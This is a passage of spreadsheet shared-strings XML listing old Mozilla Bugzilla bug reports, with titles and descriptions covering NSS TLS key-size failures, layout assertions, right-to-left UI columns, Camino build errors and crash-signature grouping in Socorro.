    <t>TECH_EVANGELISM_GRAVEYARD-169721</t>
  </si>
  <si>
    <t>volvocars.at - javascript:beginConfig()</t>
  </si>
  <si>
    <t>kilck on Der Volvo Car Configurator -&gt; then MODELL WÃ„HLEN (the black car) -&gt;
i  think the browser loads sum files well but after that it hangs.
I thes this with mozilla 1.1b linux and windows nt and 1.2a windos nt (ie 5
works well)
the them is at the german website http://www.volvocars.de</t>
  </si>
  <si>
    <t>o.krueckel</t>
  </si>
  <si>
    <t>NSS-259229</t>
  </si>
  <si>
    <t>TLS handshakes fail when server DHE params exceed NSS size limits</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040510
Build Identifier: Thunderbird version 0.7.3 (20040803)
Probably because of #define DH_MAX_P_BITS 1024 any client SSL/TSL handshake
that requires an ephemeral DH key generation will fail with error
SEC_ERROR_KEYGEN_FAIL (-8092).
By some estimates the strength of 1024 bit DH corresponds to 80 bit symmetrical
encryption. It is reasonable for the server to offer stronger DH in ciphersuites
such as TLS_DHE_RSA_WITH_AES_256_CBC_SHA. 
Client such as Thunderbird 0.7.3 will select any DHE ciphersuite just to fail
later.
Reproducible: Always
Steps to Reproduce:
# On the same host where you run Thunderbird do the following:
   openssl dhparam -out dhparam-2048 2048
# create file server.pem with proper content
# run the following: 
   openssl s_server -debug -accept 1993 -cipher EDH-RSA-DES-CBC3-SHA 
# Change IMAP server settings in Thunderbird to the localhost:1993 secure IMAP.
# Click on any IMAP folder such as Inbox.   
# The Thunderbird will display certificate warnings and hang.
# openssl will wait after displaying ACCEPT line.
# This is a normal behaviour everything is setup for the test
Actual Results:  
# now exit the openssl and run it again with the following addition: 
   openssl s_server -debug -accept 1993 \
      -cipher EDH-RSA-DES-CBC3-SHA -dhparam dhparam-2048
# Click on the IMAP folder in Thunderbird again. 
# This time the Thunderbird will display error -8092
Expected Results:  
The NSS should support at least 2048 bit DH key generation consistent with the
strength of other algirithms it implements.
The fix is probably as easy as changing 
   #define DH_MAX_P_BITS 1024 
to 2048. 
If not something else must be done to improve interoperability with correct
IMAPs/POPs (HTTPs too?) servers that are broken because of this issue
NSS seems the be the easiest place to fix this problem. Other workarounds
include scaling back support by the NSS client of stronger ciphersuites such as
TLS_DHE_RSA_WITH_AES_256_CBC_SHA to allow servers to limit 2048 EDH to these
ciphersuites.
Tested on Linux Redhat Fedora Core 2 and Win32 with Thunderbird and
openssl-0.9.7a-35. Also used another SSL server to verify the issue.</t>
  </si>
  <si>
    <t>FIREFOX-171606</t>
  </si>
  <si>
    <t>Add dropmarker to icon in search bar</t>
  </si>
  <si>
    <t>CORE-382199</t>
  </si>
  <si>
    <t>ASSERTION: Disagreement about whether it's a block or not with table-as-root float absolute</t>
  </si>
  <si>
    <t>Created attachment 266321
testcase
The testcase triggers two assertions on Mac trunk:
###!!! ASSERTION: wrong kind of child frame: 'aIsBlock == f-&gt;GetStyleDisplay()-&gt;IsBlockLevel()' file /Users/jruderman/trunk/mozilla/layout/generic/nsLineBox.cpp line 71
###!!! ASSERTION: Disagreement about whether it's a block or not: 'fromLine-&gt;IsBlock() == fromLine-&gt;mFirstChild-&gt;GetStyleDisplay()-&gt;IsBlockLevel()' file /Users/jruderman/trunk/mozilla/layout/generic/nsBlockFrame.cpp line 2278
Also the red absolute block has mysterious space on the right side as if it's trying to make room for the float block.</t>
  </si>
  <si>
    <t>CORE-135272</t>
  </si>
  <si>
    <t>columns content doesn't flip when setting the UI aligned to the right</t>
  </si>
  <si>
    <t>ignore component field in this bug. someone decided that only 10 languages in
the world can have l10n problems.
this was tested on moz 0.9.8 but it's my understanding that it exists in later
builds too: some languages (hebrew arabic and others) are written right to
left so the command 
windowdialogwizardpage {
direction: rtl
 }
needs to be added to the file intl.css in the folder locale/ab-CD/global in the
language pack ab-CD.jar file (ab-CD replaced with the language and country codes
of course). this causes the interface to be aligned to the right when the pack
is activated. 
problem: columns content like the columns in the mail/news client or the
address book or the bookmarks manager remaine aligned to the left with their
content positioned as if the UI is still aligned to the left with only the
column headers aligned to the right. e.g.: in the mail client the subject
header is at the right but the subject column is at the left.
expected result: columns should flip order and be aligned to the right like the
headers.
reprodicible: always
Steps to Reproduce:
1. open the file en-US.jar in the chrome folder
2. extract the file intl.css
3. edit the file as described
4. add the file back to en-US.jar (while maintaining folder structure)
5. start Mozilla Mail.
Actual Results:
interface is aligned to the right but message information (subject sender
date etc.) is not. the same with other components mentioned above.
Expected Results:
all columns should flip order with the thread on the right then subject then
sender etc.
[my first bug report hope it's OK ) ]</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-292075</t>
  </si>
  <si>
    <t>Profile: BackEnd</t>
  </si>
  <si>
    <t>improve seamonkey's local profile support</t>
  </si>
  <si>
    <t>bug 291033 added the ability to have a local profile directory
that directory should be salted like the normal profile dir
and for manually created directories in a path outside of application data the
temp directory should maybe be identical to the profile dir.</t>
  </si>
  <si>
    <t>CORE-310996</t>
  </si>
  <si>
    <t>We shouldn't assert in nsSVGEnum::SetValueString</t>
  </si>
  <si>
    <t>This assertion is bogus. Currently we assert to show there is an error in the
content. At the very most we should warn.</t>
  </si>
  <si>
    <t>CORE-356219</t>
  </si>
  <si>
    <t>window.minimize() window.maximize() and window.restore() are not implemented in cocoa widget</t>
  </si>
  <si>
    <t>window.minimize() window.maximize() and window.restore() are not implemented in cocoa widget.</t>
  </si>
  <si>
    <t>NSPR-366194</t>
  </si>
  <si>
    <t>RISC OS nspr support refinement</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-1)
Build Identifier: 
This is a small change to the support for RISC OS in nspr submitted 18 months ago.  It is against the version used for Firefox 2.0.0.1 but is sufficiently trivial to be suitable for CVS HEAD also.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>FIREFOX-350183</t>
  </si>
  <si>
    <t>[regression] Back / Forward icons not vertically aligned anymore too high</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.1b2) Gecko/20060825 BonEcho/2.0b2 ID:2006082504
The back/forward icons are too high up on the toolbar. They used to be vertically centered but no more. Icons were properly aligned in the 20060824 nightly.
Probably a regression from bug 349148</t>
  </si>
  <si>
    <t>CORE-509596</t>
  </si>
  <si>
    <t>NJ merge: remove some dead code</t>
  </si>
  <si>
    <t>Created attachment 393651
kill dead stuff deader
Straight port of tamarin cset 5c0cdda5b8c2.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-513004</t>
  </si>
  <si>
    <t>CVS access for bholley</t>
  </si>
  <si>
    <t>gavin made me a despot account so that I could be listed as an Imagelib but apparently that means I should have a cvs account also. I already have hg access per bug 450124.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-401812</t>
  </si>
  <si>
    <t>[10.5] Can't build Camino with 10.5 SDK: error: InterfaceBuilder/InterfaceBuilder.h: No such file or directory</t>
  </si>
  <si>
    <t>When configured with --with-macos-sdk=/Developer/SDKs/MacOSX10.5.sdk the build fails at:
    /Developer/usr/bin/gcc-4.0 -x objective-c-header -arch i386 -pipe -Wno-trigraphs -fpascal-strings -fasm-blocks -Os -Wreturn-type -Wunused-variable -fmessage-length=0 -mmacosx-version-min=10.5 -I/lizard/trunk/build/camino-shared-10.5/camino/IBPalette/build/CaminoViewsPalette.build/Deployment/CaminoViewsPalette.build/CaminoViews.hmap -O2 -F/lizard/trunk/build/camino-shared-10.5/camino/IBPalette/build/Deployment -I/lizard/trunk/build/camino-shared-10.5/camino/IBPalette/build/Deployment/include -I/lizard/trunk/build/camino-shared-10.5/camino/IBPalette/build/CaminoViewsPalette.build/Deployment/CaminoViewsPalette.build/DerivedSources -isysroot /Developer/SDKs/MacOSX10.5.sdk -c /lizard/trunk/build/camino-shared-10.5/camino/IBPalette/src/CaminoViewsPalette_Prefix.pch -o /Library/Caches/com.apple.Xcode.502/SharedPrecompiledHeaders/CaminoViewsPalette_Prefix-apfpiikvhzrcarecrorqroskseps/CaminoViewsPalette_Prefix.pch.gch
/lizard/trunk/build/camino-shared-10.5/camino/IBPalette/src/CaminoViewsPalette_Prefix.pch:7:50: error: InterfaceBuilder/InterfaceBuilder.h: No such file or directory
** BUILD FAILED **
make[5]: *** [libs] Error 1
make[5]: Leaving directory `/lizard/trunk/build/camino-shared-10.5/camino/IBPalette'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/lizard/trunk/build/camino-shared-10.5/camino'
make[3]: *** [libs_tier_app] Error 2
make[3]: Leaving directory `/lizard/trunk/build/camino-shared-10.5'
make[2]: *** [tier_app] Error 2
make[2]: Leaving directory `/lizard/trunk/build/camino-shared-10.5'
make[1]: *** [alldep] Error 2
make[1]: Leaving directory `/lizard/trunk/build/camino-shared-10.5'
make: *** [alldep] Error 2
make: Leaving directory `/lizard/trunk/mozilla'
InterfaceBuilder.framework is not a part of the Mac OS X 10.5 SDK.  There does not appear to be a direct replacement.</t>
  </si>
  <si>
    <t>CORE-201001</t>
  </si>
  <si>
    <t>cells in a table get messed up when placing the table into two nested absolute positioned DIVs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4a) Gecko/20030401
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4a) Gecko/20030401
The horizontal cell alignment doesn't work if you place the table into two
nested absolute positioned DIVs.
example code:
div {position:absolute}
td {border-width:1pxborder-style:solid}
hier steht washier auchund hier nochmal
linksmitterechts
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>semmel</t>
  </si>
  <si>
    <t>CORE-76733</t>
  </si>
  <si>
    <t>DocumentViewer::GetInLink ::GetInImage should be quieter.</t>
  </si>
  <si>
    <t>DocumentViewer::GetInLink and ::GetInImage assert too much through their helper
functions. Hush.</t>
  </si>
  <si>
    <t>TOOLKIT-234489</t>
  </si>
  <si>
    <t>Can't install any extension (only on ppc)</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (X11 U Linux ppc en-US rv:1.6) Gecko/20040210 Firefox/0.8
When I install an extension the download manager opens but nothing happens
after that.  Even the XPI for downloading isn't shown (like it does on my x86
and sparc).  A friend of mine told me that he has segfaults during this action.
I saw something similar in bug #233843 also PPC but on Mac OS X.
Reproducible: Always
Steps to Reproduce:
1. compile firefox-0.8 from the official tar-ball
2. go to the extensions room
3. choose an extension for download
Actual Results:  
download manager opens but nothing will be downloaded
Expected Results:  
download the extension and install it</t>
  </si>
  <si>
    <t>BUGZILLA-512606</t>
  </si>
  <si>
    <t>Statuses currently available for the user to change this bug to should be controlled by Bugzilla::Bug not the template</t>
  </si>
  <si>
    <t>Right now there's a lot of logic in knob.html.tmpl to control what statuses are available to change to for the current bug. Instead I think we should have this in an accessor like $bug-&gt;available_statuses so that we can do all the actual user-related control there (and take anything user-related out of Bugzilla::Status if it's there--just have it return literal information about the workflow).</t>
  </si>
  <si>
    <t>CORE-484814</t>
  </si>
  <si>
    <t xml:space="preserve"> is choppy on WindowsXP (32bit) / affected by screen drawing.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090322 Shiretoko/3.5b4pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090322 Shiretoko/3.5b4pre
Hello
while playing back media embedded within an  tag the playback performance on the WinXP machines I've tested on is choppy and unusable as is. My own experiments have shown that the performance is affected more when screen activity is busiest scrolling down a page for example and that some performance can be increased if the browser is minimised or a new blank tab is created and selected. Even then performance is frequently interrupted by disk activity.
This ticket is a continuation from this https://bugzilla.mozilla.org/show_bug.cgi?id=462667#c13
For developers interested in this I can supply a URL to test against. It's not something I can make public for various reasons.
Reproducible: Always
Steps to Reproduce:
1. Load up Firefox 3.{1|5}beta in a WindowsXP(32bit) environment
2. Navigate to a page using the  element and commence audio playback.
3. Try scrolling down the page moving the browser window. Notice choppiness.
Actual Results:  
audio playback is directly affected by screen draw actions. Even without any heavy screen drawing activity playback is prone to odd jumps interruptions. Other actions will also cause choppiness such as disk i/o
Expected Results:  
I expect the audio to playback without interruptions.
like I said I can provide a link to an  using page but it's not a link I can make public at this point.</t>
  </si>
  <si>
    <t>expensivelesbian</t>
  </si>
  <si>
    <t>CORE-167745</t>
  </si>
  <si>
    <t>webcal: protocol not supported</t>
  </si>
  <si>
    <t>webcal protocol should essentially forward the URL to iCal on the Mac.  IE
already does this.  None of: my 1.2a mozilla build the released 0.5 Chimera
nor the latest Netscape release properly forward this URL on my machine.  Steve
Dagley claims this should already work.  My machine disagrees.  Does this work
for anyone else?  And if not who best to get it in?</t>
  </si>
  <si>
    <t>SEAMONKEY-57869</t>
  </si>
  <si>
    <t>Spelling error in warning message</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/seamonkey/source/xpfe/components/xfer/resources/locale/en
-US/downloadProgress.properties#46
The message says: The plugin performed an illegal operation. You are strongly 
adviced to restart Navigator.
'Advised' is probably more appropriate spelling.</t>
  </si>
  <si>
    <t>serhunt</t>
  </si>
  <si>
    <t>MOZILLA.ORG-436661</t>
  </si>
  <si>
    <t>SVN access to projects/spreadfirefox.com/trunk/worldrecord/locale/es-ES</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.9) Gecko/2008051202 Firefox/3.0
Build Identifier: 
I need SVN access to
projects/spreadfirefox.com/trunk/worldrecord/locale/es-ES for localization.
My SVN user is nukeador@gmail.com
Requesting approval based on bug 436135 comment #47
https://bugzilla.mozilla.org/show_bug.cgi?id=436135#c47
Reproducible: Always</t>
  </si>
  <si>
    <t>nukeador</t>
  </si>
  <si>
    <t>TOOLKIT-444821</t>
  </si>
  <si>
    <t>Re-enable test_storage_statement_executeAsync.js</t>
  </si>
  <si>
    <t>I just disabled this test because it looks like it's a vm issue.  Need to investigate it when the tree isn't so busy...</t>
  </si>
  <si>
    <t>CORE-526320</t>
  </si>
  <si>
    <t>Remove nsIDOMGeoPositionError::UNKNOWN_ERROR</t>
  </si>
  <si>
    <t>At the geolocation face to face we discussed and agreed that the UNKNOWN_ERROR should be removed from the position error.</t>
  </si>
  <si>
    <t>CALENDAR-309868</t>
  </si>
  <si>
    <t>Error while import .ics file in calIICSService.parseICS</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20050923 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20050923 Mozilla Sunbird/0.2+
I have several calendar file generated and edited with Sunbird 0.2.
When I try to import some of the .ics files into Sunbird 0.2+ I get an error in
JavaScript Console. Other .ics files works fine.
Reproducible: Always
Steps to Reproduce:
1. Import events from attached file Mondphasen.ics into Sunbird 0.2+
Actual Results:  
Events are not imported. Error in message in JavaScript Console and Alert popup:
---------------------------------------------------------------------------
Error: [Exception... 
Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) 
[calIICSService.parseICS]  nsresult: 0x80004005 (NS_ERROR_FAILURE)  
location: JS frame :: file:///D:/sunbird/components/calIcsImportExport.js 
                    :: ics_importFromStream :: line 75  data: no]
Source File: file:///D:/sunbird/components/calIcsImportExport.js
Line: 75
---------------------------------------------------------------------------
Expected Results:  
Events are imported and displayed in current calendar.
ics file generated and edited with:
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a5) Gecko/20050203 Mozilla
Sunbird/0.2
Import fails on: 
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20050923 Mozilla
Sunbird/0.2+</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-59079</t>
  </si>
  <si>
    <t>Expose nsIDocShell::LoadStream().</t>
  </si>
  <si>
    <t>Add this feature.</t>
  </si>
  <si>
    <t>edburns</t>
  </si>
  <si>
    <t>SEAMONKEY-171933</t>
  </si>
  <si>
    <t>Dialog boxes missing Text no Don't save Don't Delete Files etc.. in buttons</t>
  </si>
  <si>
    <t>I saw this in pretty much every dialog that had a yes no and cancel button 
Pretty much ever No dialog is missing text but is still usable.
This affects all platforms.</t>
  </si>
  <si>
    <t>THUNDERBIRD-521000</t>
  </si>
  <si>
    <t>Port generate-snippet-ab-CD to mail/locale/Makefile</t>
  </si>
  <si>
    <t>As part of bug 470679 to generate l10n updates we need to port over the generate-snippet-ab-CD target to Thunderbird's mail/locale/Makefile.in
It's a simple invocation of the same python script used by Firefox</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-341846</t>
  </si>
  <si>
    <t>Don't encode fwd-slash ( / ) when doing keyword substitution</t>
  </si>
  <si>
    <t>In bug 326532 in addition to &amp; a number of other characters apparently got encoded.
Encoding / breaks a number of my keywords (Firefox does not encode / and at least Google searches for items with / in them work properly with / not encoded).</t>
  </si>
  <si>
    <t>BUGZILLA-26074</t>
  </si>
  <si>
    <t>Ability to limit search by number of Comments</t>
  </si>
  <si>
    <t>Requested: a way to limit searches to just those bug reports to which no
additional comments have been made since they were reported.
The bugs that most need attention on the Browser-General list are those
that have been in the database for some time but nobody has added any comments
to yet. Among the bugs one or more weeks old most have had some comment added
so at present there is no good way to zero in on these bugs.
Now that boolean charts have been added it would always be possible to
AND a search with the bugs that do not contain the string
-- Additional Comments From but that would be brutally expensive.
Since it probably isn't going to ever be necessary to know the number of
comments added this would amount to adding a boolean field set to 0 when a 
bug is created and set to 1 when a comment is added.
Enabling this would allow both those prescreening older Browser-General bugs 
and those prescreening recent bugs across all components to concentrate on
those not already touched reducing duplication of effort.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-107107</t>
  </si>
  <si>
    <t>Spanish</t>
  </si>
  <si>
    <t>seat.es - is optimized for IE and NS4 in Windows</t>
  </si>
  <si>
    <t>seat.es (a somewhat big spanish car company) redirects you to the typical:
sorry but we don't know what f* browser are you using with Mozilla in Linux. 
Let's Evangelize them.</t>
  </si>
  <si>
    <t>spanish</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-317993</t>
  </si>
  <si>
    <t>Bonsai</t>
  </si>
  <si>
    <t>Improve error reporting for handle*</t>
  </si>
  <si>
    <t>CORE-386729</t>
  </si>
  <si>
    <t>Textarea context menu appears on page with contenteditable node</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9a7pre) Gecko/2007070304 Minefield/3.0a7pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9a7pre) Gecko/2007070304 Minefield/3.0a7pre
See the testcase URL (from bug #237964). If you right click anywhere on the page (except on the buttons) the textarea context menu will appear. Switching the contenteditable attribute off doesn't fix this.
Reproducible: Always
Actual Results:  
The page context menu should appear for all parts of the page that are not textareas (or contenteditable I guess?).</t>
  </si>
  <si>
    <t>albert.brand</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-459214</t>
  </si>
  <si>
    <t>make commits from ReleaseTaggingFactory use hgUsername instead of hardcoding 'cltbld'</t>
  </si>
  <si>
    <t>Two things here:
1) s/cltbld/ffxbld/ in the existing message.
2) Pass in '-u ffxbld' to avoid an ugly username such as cltbld@moz2-linux-slave1.build.mozilla.org</t>
  </si>
  <si>
    <t>SEAMONKEY-230649</t>
  </si>
  <si>
    <t>nsIPref removal in Mail Window Front End</t>
  </si>
  <si>
    <t>There appear to be just two JS users of nsIPref in mail window front end code.</t>
  </si>
  <si>
    <t>CORE-80837</t>
  </si>
  <si>
    <t>Twisties and thread lines should not be selected with rows</t>
  </si>
  <si>
    <t>Jan giving this to you because I don't think hyatt will be able to get to 
these for awhile.  If you don't want them reassign to hyatt or perhaps I can 
take them.
Twisties and thread lines should not be selected with the rest of the rows.  
Attaching screenshot to clarify.</t>
  </si>
  <si>
    <t>MARKETPLACE_GRAVEYARD-906145</t>
  </si>
  <si>
    <t>Payments/Refunds</t>
  </si>
  <si>
    <t>Webpay has fuzzy strings in en-US</t>
  </si>
  <si>
    <t>From https://github.com/mozilla/webpay/issues/244
It sounds like there are fuzzy strings in en-US.  This shouldn't happen and https://github.com/mozilla/webpay/blob/master/locale/omg_new_l10n.sh#L50 strips them out the same way we do in other projects.
This might be an easy fix if someone didn't extract with the omg_new_l10n script but if they did something weird must have happened.  Should be able to run it now and see if it strips them out.</t>
  </si>
  <si>
    <t>CORE-499852</t>
  </si>
  <si>
    <t>up network thread priority on Windows CE</t>
  </si>
  <si>
    <t>Created attachment 384541
set network thread priority
To avoid network slowdowns it helps to up the network thread priority on Windows CE here's a simple patch that does this.  The suggested 116 priority came from various contacts for CE6.
(This is the right thread to set right?  We don't do IO on any other threads?)</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-433409</t>
  </si>
  <si>
    <t>Need to ensure that the version history page's buttons are application-specific</t>
  </si>
  <si>
    <t>See https://bugzilla.mozilla.org/show_bug.cgi?id=430733#c16 and https://preview.addons.mozilla.org/en-US/firefox/addons/versions/71 as an example.
Basically even though we now have blow-by-blow version information we need to ensure that the download/install buttons are appropriate for the specific version's application support.
Right now they all say Add to Firefox even if they're only for SeaMonkey or Thunderbird.
I guess we should just display the appropriate Add to SeaMonkey Download Now buttons right?</t>
  </si>
  <si>
    <t>stephen.donner</t>
  </si>
  <si>
    <t>SOCORRO-526046</t>
  </si>
  <si>
    <t>SkipList Generate better signatures for crashes related to unhandled Obj-C exceptions</t>
  </si>
  <si>
    <t>Sam Stuart and I have been talking about the way Socorro/crash-stats is currently lumping together many unrelated crashes related to Obj-C exceptions and how to make the signatures for such crashes useful.
On 10.5/10.6 these exception-related crashes look like:
0 CoreFoundation        ___TERMINATING_DUE_TO_UNCAUGHT_EXCEPTION___  	
1 libobjc.A.dylib       objc_exception_throw 	
2 CoreFoundation        -[NSException raise] 	
3              
Here frame 0 adds no value and should be ignored/skipped.  Frames 1 and 2 tell us the crash comes from an exception and we want to know that (exceptions can be thrown directly from objc_exception_throw and -[NSException raise] so we need to look for and prepend/compound both and can't ignore one).  Then we want Frame 3 which tells us what bit of code is causing the exception.
The desired signature from the above crash would look like
objc_exception_throw | -[NSException raise] | 
with possible variants (depending on how the particular exception flow happened)
objc_exception_throw | 
-[NSException raise] | 
On 10.4 these crashes look like:
0   	
1 Foundation    _NSRaiseError 	
2 Foundation    +[NSException raise:format:] 	
3      
Here Frame 0 is something that's likely to be ignored/skipped already (certain raw addresses) or something that we already make part of a compound signature/prepend (objc_msgSend).  Frame 1 doesn't tell us anything useful and can be skipped.  Frame 2 though tells us we're crashing from an exception (we want to know that) and we want that compounded with/prepended to Frame 3 which tells us what bit of code is causing the exception.
The desired signature from the above crash would look like
objc_msgSend | +[NSException raise:format:] | 
with possible variants (depending on what frame 0 was)
+[NSException raise:format:] | 
 | +[NSException raise:format:] | 
In summary when encountering these frames please
Skip/Ignore:
* ___TERMINATING_DUE_TO_UNCAUGHT_EXCEPTION___
* _NSRaiseError
Prepend/Compound with following frame:
* objc_exception_throw
* -[NSException raise]
* +[NSException raise:format:]
These changes will help create better exception-related signatures so that we can easily see where they're actually coming from and have crashes grouped appropriately.  Thanks!</t>
  </si>
  <si>
    <t>MOZILLA.ORG-345177</t>
  </si>
  <si>
    <t>remove mozilla-org/html/start-snippets/zh-TW from repository</t>
  </si>
  <si>
    <t>cvs-www.mozilla.org:/cvsroot has both zh-TW and zh-tw subdirectories this constantly gives cvs update errors.
As there is hardly any historic value I'd like to get the zh-TW directory removed from the repository.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-234033</t>
  </si>
  <si>
    <t>Remove X-Accept-Language header</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206
The Mozilla Mail and Mozilla Thunderbird mail clients generate an e-mail header
X-Accept-Language: en-us en.
When using the Mozilla application suite the language settings can be changed
using the BROWSER's language options.
When using Mozilla Thunderbird the UI does not allow one to change the language
settings.
Either the language settings should be made a configurable option or the mail
header line X-Accept-Language: en-us en should be omitted. I'm not sure
what's the use of this header line in an e-mail message. I'd prefer it to be
omitted.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-129960</t>
  </si>
  <si>
    <t>Need to backslash escape computed URI values</t>
  </si>
  <si>
    <t>Spinning this off from bug 128428 comment 18
We need to backslash escape special characters in URIs per the spec.  Once we do
this we need to teach the code for the background image context menu about this.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-463339</t>
  </si>
  <si>
    <t>JS engine build system doesn't update existing libmozjs.so in depend builds.</t>
  </si>
  <si>
    <t>Doing a depend build of Firefox copies libmozjs.so into dist/bin in the obj dir making a change in the JS engine source and rebuilding doesn't update the libmozjs.so file in the obj directory.
There's a dist/bin directory in js/src as well as in the top of the firefox object directory so I don't know if that's part of the confusion or not. Also seems like we'd want there to be a symbolic link in the dist/bin directory rather than a copy of the file.
This is biting developers so we should attempt to fix this ASAP.</t>
  </si>
  <si>
    <t>TOOLKIT-340866</t>
  </si>
  <si>
    <t>Anti-phishing only works on the last opened window (fails otherwise)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
The Web Forgery signal is only given inside the last Bon Echo 2.0a3 window open that was opened. It does not show in any former window. This has nothing to do with the tabs.
Reproducible: Always
Steps to Reproduce:
1. Have a Firefox 2.0a3 (A.K.A. Bon Echo) open.
2. Open another window.
3. Within the original window (or any previous window)open the Google Safe Browsing Test Page i.e. http://www.google.com/tools/firefox/safebrowsing/phish-o-rama.html
Actual Results:  
No Web Forgery alert is given.
Expected Results:  
The Web Forgery alert should come up! As it does *only* within the last opened window.
Also to reproduce:
1. Open a Bon Echo window.
2. Open a second window.
3. Close the second window.
4. Got to the test page (within the first window).</t>
  </si>
  <si>
    <t>johngraciliano</t>
  </si>
  <si>
    <t>SEAMONKEY-122992</t>
  </si>
  <si>
    <t>Remove editorshell dependencies from editor.js</t>
  </si>
  <si>
    <t>We need to get rid of editorshell's editor type string.
Instead people should be using the editorshell's editor's flags.
Right now there are bugs in various places in the code where we assume html
is only Composer but that isn't true.  Hopefully we can get this all
straightened out by removing the editortype.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-95396</t>
  </si>
  <si>
    <t>blogger.com - Blogger edit buttons disappear when too much text fills field</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:0.9.3+) Gecko/20010814
BuildID:    2001081403
At www.blogger.com creating a blog (web log) and making a post works until one types more text than the text field can hold without need for a scrollbar whereupon the buttons to post post and publish spell check and the title of the blog disappear
Reproducible: Always
Steps to Reproduce:
1. Sign up for an account at www.blogger.com
2. Create a blog
3. Type stuff in the 'posts' section until the scrollbar appears because there is more text than will fit in the field without scrolling
Actual Results:  Typing the first line after the text field filled caused one 'line' of the bar with the buttons and the text to disppear.
Typing the second caused another 'line' to disppear
Expected Results:  The scrollbar appears and the bar on top is unchanged.</t>
  </si>
  <si>
    <t>gabrielseah</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-115710</t>
  </si>
  <si>
    <t>meta bug: ftang's mac bidi tracking bug</t>
  </si>
  <si>
    <t>THUNDERBIRD-296422</t>
  </si>
  <si>
    <t>Difficulty reverting to Classic 3 pane view</t>
  </si>
  <si>
    <t>Seen on windows Thunderbird trunk build 2005-06-02-06-trunk
-Go to View | Layout
-Select Wide View then switch to Vertical View
-Finally attempt to switch back to Classic View
tested results:  notice the preview pane becomes a bit wider. But the 3 pane
arrangement is still in Vertical View
expected results: 3 Pane view returns to Classic arrangement.
work-around:
switch back to Verticle View. Once again switch to Classic View. 
The same can be said if trying to revert to Classic view while set in Wide View.
 Go back to Wide View then switch to Classic a second time.</t>
  </si>
  <si>
    <t>CALENDAR-330496</t>
  </si>
  <si>
    <t>Agenda: yesterday's all day event is shown in 'Today' category</t>
  </si>
  <si>
    <t>Agenda: yesterday's all day event is shown in 'Today' category
Steps to Reproduce:
1. Go to current day (aka today)
2. Create an all day event that is scheduled yesterday
3. Check Agenda in Lightning sidebar
Actual Results:
The all day event is shown in 'Today' category
Expected Results:
Yesterday's all day event is not shown in 'Today' category.
Additional Information:
Tested with Thunderbird 1.5 (20051201) + Lightning 0.1 (20060313) on Win2K.
The timezone of the event matters. If the event is not created in the current selected timezone the result varies.
Reference:
http://forums.mozillazine.org/viewtopic.php?p=2145585#2145585</t>
  </si>
  <si>
    <t>SEAMONKEY-64462</t>
  </si>
  <si>
    <t>Play custom sound when new mail arrives (implement hidden prefs and design UI)</t>
  </si>
  <si>
    <t>I assigning this to you ryan I hope that is ok.
we've got three prefs:
mail.biff.play_sound
mail.biff.use_default_sound
mail.biff.sound_file
only the first is currently reflected in the ui.  let me attach a screen shot of
what ryan is working on in his tree.</t>
  </si>
  <si>
    <t>CORE-394792</t>
  </si>
  <si>
    <t>[FIX]Only bother updating text input commands for focused text inputs</t>
  </si>
  <si>
    <t>We currently trigger a select command update whenever the selection changes in any text field. However our select commandupdaters only ever care about the selection in the focused field. All other events are therefore pointless.
This applies to undo command updates too.</t>
  </si>
  <si>
    <t>THUNDERBIRD-227288</t>
  </si>
  <si>
